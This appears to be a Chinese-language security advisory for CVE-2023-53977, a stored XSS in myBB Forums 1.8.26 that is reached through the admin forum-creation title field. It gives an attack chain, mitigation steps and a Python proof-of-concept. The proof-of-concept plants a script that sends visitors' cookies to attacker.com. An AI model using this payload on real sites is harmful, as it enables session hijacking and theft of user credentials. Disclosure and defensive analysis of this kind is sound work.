CVE-2023-53977 myBB Forums 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2023-53977

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

myBB Forums

漏洞概述

CVE-2023-53977是myBB Forums 1.8.26版本中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于论坛管理系统（Forum Management）模块中，允许已认证的管理员用户在创建新论坛时注入恶意JavaScript脚本。攻击者通过在论坛标题字段中插入恶意载荷，当其他用户访问论坛列表页面时，存储的恶意脚本会在受害者浏览器中执行。成功利用此漏洞可导致多种严重后果，包括会话劫持、窃取用户凭据、冒充用户执行操作、传播恶意内容等。由于攻击发生在管理员创建论坛的场景下，攻击者可以利用窃取的会话令牌进一步提升权限或执行更高级别的攻击。该漏洞的CVSS评分为5.4，属于中等严重程度，但结合实际攻击场景，可能造成严重的安全影响。漏洞已于2025年12月22日公开披露，建议相关用户立即采取修复措施。

技术细节

该漏洞的根本原因在于myBB Forums 1.8.26的论坛管理功能对用户输入的论坛标题字段缺乏充分的输入验证和输出编码。在admin panel的'Forums and Posts' -> 'Forum Management'界面中，当管理员创建新论坛时，系统未能对forum title参数进行HTML实体转义或内容过滤。攻击者可以在论坛标题中插入恶意HTML或JavaScript代码，如<script>标签或事件处理器属性（如onerror、onload等）。这些恶意内容会被直接存储到数据库中，当其他用户访问论坛列表页面时，服务器从数据库读取并输出这些未经过滤的内容，导致恶意脚本在用户浏览器中执行。攻击者可以利用此漏洞窃取受害者的cookies、会话令牌或其他敏感信息。由于该功能仅对管理员开放，攻击者需要先获取管理员账号或利用其他漏洞提升权限后才能实施攻击。在实际攻击场景中，攻击者可能通过钓鱼邮件或社工手段获取初始管理员访问权限。

攻击链分析

STEP 1

步骤1

攻击者通过钓鱼、社会工程或其他漏洞获取myBB Forums管理员账户凭据

STEP 2

步骤2

攻击者登录管理后台，导航至'Forums and Posts' -> 'Forum Management'模块

STEP 3

步骤3

攻击者选择创建新论坛（Add New Forum），在论坛标题字段中注入恶意JavaScript代码

STEP 4

步骤4

提交表单后，恶意脚本被存储到数据库中，未经过滤或转义

STEP 5

步骤5

当其他用户或管理员访问论坛列表页面时，服务器从数据库读取并输出包含恶意代码的论坛标题

STEP 6

步骤6

受害者浏览器执行恶意JavaScript，攻击者可窃取会话cookies、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2023-53977 myBB Forums Stored XSS PoC
# Target: myBB Forums <= 1.8.26
# Attack Vector: Forum Management - Create New Forum

import requests
import re

# Configuration
target_url = "http://target-site.com/mybb"
admin_username = "admin"
admin_password = "password"

# XSS Payload
xss_payload = "<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"

# Step 1: Login as administrator
session = requests.Session()
login_url = f"{target_url}/admin/index.php?module=home&action=login"
login_data = {
    "username": admin_username,
    "password": admin_password
}
response = session.post(login_url, data=login_data)

# Step 2: Navigate to Forum Management
forum_url = f"{target_url}/admin/index.php?module=forum-management"
response = session.get(forum_url)

# Step 3: Create new forum with XSS payload in title
create_forum_url = f"{target_url}/admin/index.php?module=forum-management&action=add"
forum_data = {
    "title": xss_payload,
    "description": "Forum description",
    "submit": "Create Forum"
}
response = session.post(create_forum_url, data=forum_data)

# Step 4: Verify XSS is stored
print(f"XSS payload sent: {xss_payload}")
print("Payload stored in forum title - will execute when viewed")

# The XSS will trigger when any user views the forum listing page

影响范围

myBB Forums < 1.8.27

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）限制管理后台访问IP，仅允许可信IP访问；2）启用严格的会话管理和多因素认证；3）在Web应用防火墙（WAF）层面配置XSS防护规则，过滤<script>标签和事件处理器属性；4）临时禁用论坛创建功能，仅允许通过数据库直接添加；5）增加对管理操作的实时监控和告警机制。